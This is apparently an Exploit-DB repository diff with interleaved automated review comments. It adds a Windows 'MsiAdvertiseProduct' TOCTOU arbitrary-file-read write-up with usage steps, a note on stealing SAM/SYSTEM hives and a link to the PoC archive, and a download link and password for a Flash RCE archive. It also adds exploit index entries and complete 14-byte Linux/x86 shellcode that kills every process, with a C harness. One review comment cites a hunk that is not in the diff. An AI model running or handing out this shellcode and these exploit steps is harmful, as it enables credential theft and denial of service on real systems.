@@ -0,0 +1,23 @@ +The bug is in “MsiAdvertiseProduct” + +Calling this function will result in a file copy by the installer service. + +This will copy an arbitrary file that we can control with the first parameter into c:\windows\installer … a check gets done while impersonating, but using junctions there is still a TOCTOU .. meaning we can get it to copy any file as SYSTEM, and the destination file will always be readable. This results an in arbitrary file read vulnerability. + +To reproduce: + +Make sure to copy both readfile.exe and “file” (found under folder PoC-Files)… and put them in the same directory. + +Usage: readfile.exe targetfile (where targetfile is the file to read, IE: “readfile.exe c:\users\test\desktop\desktop.ini”) + +Run on 2 cores or more, this should work on one core with some modifications.. since you should be able to hit the timing with oplocks too (but I'm lazy).. you should be able to see something like this if it works: https://www.youtube.com/watch?v=x4P2H64GI1o + +The easiest way to confirm the bug is to make two local accounts and read the desktop.ini of the other account. + +Even without an enumeration vector, this is still bad news, because a lot of document software, like office, will actually keep files in static locations that contain the full path and filesnames of recently opened documents.. thus by reading files like this, you can get filenames of documents created by other users.. the filesystem is a spiderweb and references to user created files can be found everywhere.. so not having an enumeration bug is not that big of a deal. + +If shadow copies are enabled you can obviously steal the SAM and SYSTEM hive I assume... + +Maybe there's some other use-cases.. but I'm not very smart, so I don't know. + +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46040.rar \ No newline at end of file 
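Review bot: exploits/windows/local/46040.txt describes the same `MsiAdvertiseProduct` file-copy bug that the files_exploits.csv context in this same patch already lists as 46028 ("Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Read", evil_polar_bear, 2018-12-21); the two entries should cross-reference each other and state which is the original disclosure and which the port, otherwise the archive carries two near-identical titles for one issue. The text refers to `readfile.exe` and `file` "found under folder PoC-Files", which exist only inside the linked 46040.rar, so a one-line description of what the archive contains belongs in this file. The file also has none of the usual header fields (author, date, affected builds) and says nothing about whether a fix is available.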
diff --git a/exploits/windows/local/46051.txt b/exploits/windows/local/46051.txt new file mode 100644 index 000000000..a9a6cc3c1 --- /dev/null +++ b/exploits/windows/local/46051.txt @@ -0,0 +1,2 @@ +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46051.zip +Password: infected \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1635db913..1b0530faa 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6224,6 +6224,8 @@ id,file,description,date,author,type,platform,port 46022,exploits/windows/dos/46022.txt,"VBScript - VbsErase Reference Leak Use-After-Free",2018-12-20,"Google Security Research",dos,windows, 46023,exploits/windows/dos/46023.txt,"VBScript - MSXML Execution Policy Bypass",2018-12-20,"Google Security Research",dos,windows, 46030,exploits/windows/dos/46030.py,"SQLScan 1.0 - Denial of Service (PoC)",2018-12-21,"Rafael Pedrero",dos,windows, +46038,exploits/linux/dos/46038.py,"Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)",2018-12-24,Sam,dos,linux, +46042,exploits/multiple/dos/46042.html,"Google Chrome 70 - SQLite Magellan Crash (PoC)",2018-12-15,zhuowei,dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
@@ -10167,6 +10169,9 @@ id,file,description,date,author,type,platform,port 46021,exploits/windows/local/46021.py,"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)",2018-12-20,bzyo,local,windows, 46025,exploits/windows/local/46025.py,"AnyBurn 4.3 - Local Buffer Overflow (SEH)",2018-12-21,"Matteo Malvica",local,windows, 46028,exploits/windows/local/46028.txt,"Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Read",2018-12-21,evil_polar_bear,local,windows, +46040,exploits/windows/local/46040.txt,"Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Copy/Read",2018-12-20,SandboxEscaper,local,windows, +46044,exploits/linux/local/46044.md,"Keybase keybase-redirector - '$PATH' Local Privilege Escalation",2018-10-22,mirchr,local,linux, +46051,exploits/windows/local/46051.txt,"Adobe Flash ActiveX Plugin 28.0.0.137 - Remote Code Execution (PoC)",2018-12-24,smgorelik,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
@@ -17029,6 +17034,9 @@ id,file,description,date,author,type,platform,port 45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow",2018-12-18,"Rafael Pedrero",remote,windows,80 46024,exploits/multiple/remote/46024.rb,"Erlang - Port Mapper Daemon Cookie RCE (Metasploit)",2018-12-20,Metasploit,remote,multiple,25672 46034,exploits/multiple/remote/46034.py,"Netatalk < 3.1.12 - Authentication Bypass",2018-12-21,"Jacob Baines",remote,multiple, +46048,exploits/multiple/remote/46048.py,"Netatalk - Bypass Authentication",2018-12-21,"Tenable NS",remote,multiple, +46052,exploits/multiple/remote/46052.py,"Kubernetes - (Unauthenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple, +46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 
@@ -40524,3 +40532,8 @@ id,file,description,date,author,type,platform,port 46015,exploits/php/webapps/46015.txt,"Yeswiki Cercopitheque - 'id' SQL Injection",2018-12-19,"Mickael BROUTY",webapps,php,80 46017,exploits/multiple/webapps/46017.txt,"IBM Operational Decision Manager 8.x - XML External Entity Injection",2018-12-19,"Mohamed M.Fouad",webapps,multiple,9443 46027,exploits/php/webapps/46027.html,"ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)",2018-12-21,mqt,webapps,php, +46035,exploits/php/webapps/46035.txt,"WSTMart 2.0.8 - Cross-Site Scripting",2018-12-24,linfeng,webapps,php, +46036,exploits/php/webapps/46036.txt,"WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)",2018-12-24,linfeng,webapps,php, +46037,exploits/php/webapps/46037.txt,"FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection",2018-12-24,"Sainadh Jamalpur",webapps,php, +46041,exploits/php/webapps/46041.py,"phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read",2018-12-15,VulnSpy,webapps,php, +46050,exploits/php/webapps/46050.txt,"PhpSpreadsheet < 1.5.0 - XML External Entity (XXE)",2018-11-30,"Alex Leahu",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 912b07553..4142865d7 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -927,3 +927,4 @@ id,file,description,date,author,type,platform 45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64 45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86 46007,shellcodes/linux_x86-64/46007.c,"Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)",2018-12-19,"Kağan Çapar",shellcode,linux_x86-64 +46039,shellcodes/linux/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux 
diff --git a/shellcodes/linux/46039.c b/shellcodes/linux/46039.c new file mode 100644 index 000000000..0fa9f9702 --- /dev/null +++ b/shellcodes/linux/46039.c @@ -0,0 +1,42 @@ +# Exploit Title: Linux/x86 - Kill All Processes Shellcode (14 bytes) +# Google Dork: None +# Date: 2018-12-08 +# Exploit Author: strider +# Vendor Homepage: None +# Software Link: None +# Tested on: Debian 9 Stretch i386/ Kali Linux i386 +# CVE : None +# Shellcode Length: 14 +# Description: Linux/x86 kill 9 -1 (14 bytes) +------------------------------[Description]--------------------------------- + +This shellcode will kill all processes + +-----------------------------[Shellcode Dump]--------------------------------- + +08048060 <_start>: + 8048060: 31 c0 xor %eax,%eax + 8048062: 50 push %eax + 8048063: b0 25 mov $0x25,%al + 8048065: bb ff ff ff ff mov $0xffffffff,%ebx + 804806a: b1 09 mov $0x9,%cl + 804806c: cd 80 int $0x80 + + -----------------------------[Compile]--------------------------------------------- + gcc -m32 -fno-stack-protector -z execstack -o tester tester.c + + -----------------------------[C-Code]----------------------------- + + #include + #include + + unsigned char code[] = "\x31\xc0\x50\xb0\x25\xbb\xff\xff\xff\xff\xb1\x09\xcd\x80"; + main() + { + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + } \ No newline at end of file
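Review bot: in the second 46002.py hunk (`@@ -16,13 +16,13 @@`) the bare `except:` still swallows every exception, so a permissions problem on `Evil.txt` is reported only as `File cannot be created` with no cause; catching `IOError as e` and printing `e` would make failures diagnosable. The quoted-printable residue (`=3D`, `=09`, `=20`) is correctly replaced, but the file still ends without a trailing newline, as the `\ No newline at end of file` marker on both sides shows.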
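Review bot: the new exploits/windows/local/46040.txt carries none of the header fields the other entries use (Exploit Title, Date, Author, Tested on, CVE), so the date and author recorded for it in files_exploits.csv cannot be checked against the file itself; please add them, together with the affected Windows builds and whether a fix was available at the time, since the write-up only states that the installer service copies the file as SYSTEM into c:\windows\installer and that the race is a TOCTOU around the impersonated check. Relying solely on an external .rar and a YouTube link for the details also leaves nothing in the repository for a reader to verify.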
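Review bot: exploits/windows/local/46051.txt consists of a download link and an archive password only; without a title, affected version, or description in the file, a reader has to open a password-protected binary archive to learn what the entry is. At minimum the header block used by the other entries (title, date, author, tested version, vendor reference) should be included so the file is self-describing.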
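Review bot: in the `@@ -10167,6 +10169,9 @@` hunk of files_exploits.csv, 46051 is titled "Adobe Flash ActiveX Plugin 28.0.0.137 - Remote Code Execution (PoC)" but is filed under exploits/windows/local/ with type `local`; either the title or the type and path is wrong and they should agree. Also 46040 ("'MsiAdvertiseProduct' Arbitrary File Copy/Read", dated 2018-12-20) is added directly below 46028 ("'MsiAdvertiseProduct' Arbitrary File Read", 2018-12-21); please confirm these are distinct entries rather than the same bug indexed twice, and cross-reference them if they cover the same issue.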
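Review bot: in the `@@ -17029,6 +17034,9 @@` hunk, 46048 "Netatalk - Bypass Authentication" (Tenable NS) is inserted immediately after 46034 "Netatalk < 3.1.12 - Authentication Bypass" (Jacob Baines) with the same date; the new title omits the affected version range that 46034 carries. Please add the version constraint that 46048.py actually targets and note whether this is a second PoC for the same vulnerability, so users searching the CSV do not treat them as two different bugs.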
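Review bot: in the files_shellcodes.csv hunk, 46039 is registered under shellcodes/linux/ with platform `linux`, while the other 32-bit entry in the same context (45980) lives under shellcodes/linux_x86/ with platform `linux_x86`. Since the title says Linux/x86 and the disassembly is 32-bit (`int $0x80`, 32-bit registers), the path and platform field should follow the existing linux_x86 convention.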
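Review bot: shellcodes/linux/46039.c does not compile as committed: the two `#include` lines carry no header names (the harness needs `<stdio.h>` for printf and `<string.h>` for strlen), `main()` is declared without a return type, and the `# Exploit Title:` header block uses shell-style `#` comments, which are not valid C preprocessor lines. Wrapping the header and the description sections in `/* ... */` and restoring the two includes would make the file build with the documented `gcc -m32 -fno-stack-protector -z execstack` command. The Description line "Linux/x86 kill 9 -1" does match the disassembly (syscall 0x25 is kill, %ebx = -1, %cl = 9), but the file should state plainly that running the tester terminates every process the user is allowed to signal, including the caller's own session.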